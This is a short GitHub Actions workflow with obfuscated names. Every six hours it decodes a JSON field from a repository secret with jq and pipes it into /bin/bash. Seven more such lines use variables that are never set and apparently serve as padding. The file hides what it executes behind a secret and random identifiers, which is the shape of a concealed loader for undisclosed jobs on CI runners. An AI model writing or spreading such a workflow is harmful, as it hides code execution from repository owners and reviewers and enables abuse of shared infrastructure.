name: equationmilitary

on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: equationmilitary
        env:
          snly58: ${{ secrets.snly58 }}
        run: |
          echo $snly58 | jq -r .ldw68677 | /bin/bash
          echo $kvvr65 | jq -r .ek105 | /bin/bash
          echo $qouj8524 | jq -r .vn47 | /bin/bash
          echo $rn8 | jq -r .gdd282 | /bin/bash
          echo $fp0563 | jq -r .vpl67544 | /bin/bash
          echo $d8852 | jq -r .bn43506 | /bin/bash
          echo $mle6 | jq -r .q88 | /bin/bash
          echo $vz60 | jq -r .i1 | /bin/bash

